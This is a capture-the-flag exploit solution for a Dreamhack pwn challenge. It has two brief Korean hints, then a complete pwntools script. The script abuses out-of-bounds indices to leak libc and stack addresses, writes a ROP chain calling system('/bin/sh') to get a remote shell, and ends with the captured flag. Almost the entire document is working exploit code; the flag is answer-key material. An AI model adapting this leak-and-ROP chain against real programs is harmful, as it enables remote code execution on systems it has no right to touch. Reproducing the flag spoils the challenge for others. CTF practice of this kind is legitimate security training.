- OOB 이용해서 ROP하면 된다.
- puts랑 strcpy로 출력 입력 해서 null 주의해야한다.
from pwn import *
context.log_level = "debug"
io = remote("host8.dreamhack.games", 18381)
# io = process("./chall", env={"LD_PRELOAD": "./libc.so.6"})
libc = ELF("./libc.so.6", checksec=False)
io.sendlineafter(b">> ", str(1).encode())
io.sendlineafter(b": ", str(-0x1E8 // 8).encode())
libc_base = u64(io.recvn(6).ljust(8, b"\x00")) - 0x203AC0
libc.address = libc_base
log.info(f"libc base: {hex(libc_base)}")
io.sendlineafter(b">> ", str(1).encode())
io.sendlineafter(b": ", str(-5).encode())
stack = u64(io.recvn(6).ljust(8, b"\x00"))
log.info(f"stack: {hex(stack)}")
pay = (
p64(0) * 8
+ p64(stack - 0x98)
+ p64(stack - 0x90)
+ p64(stack - 0x88)
+ p64(stack - 0x80)
)
io.sendlineafter(b">> ", str(2).encode())
io.sendlineafter(b": ", str(1).encode())
io.send(pay)
io.sendlineafter(b">> ", str(2).encode())
io.sendlineafter(b": ", str(19).encode())
io.send(p64(0x000000000010F75B + libc_base + 1))
io.sendlineafter(b">> ", str(2).encode())
io.sendlineafter(b": ", str(20).encode())
io.send(p64(0x000000000010F75B + libc_base))
io.sendlineafter(b">> ", str(2).encode())
io.sendlineafter(b": ", str(21).encode())
io.send(p64(next(libc.search(b"/bin/sh\x00"))))
io.sendlineafter(b">> ", str(2).encode())
io.sendlineafter(b": ", str(22).encode())
io.send(p64(libc.sym["system"]))
io.sendlineafter(b">> ", str(3).encode())
io.interactive()
# 0x000000000010f75b: pop rdi; ret
# DH{63e68ef229895726:kO4Wzdum/dYdQIwADV0iwQ==}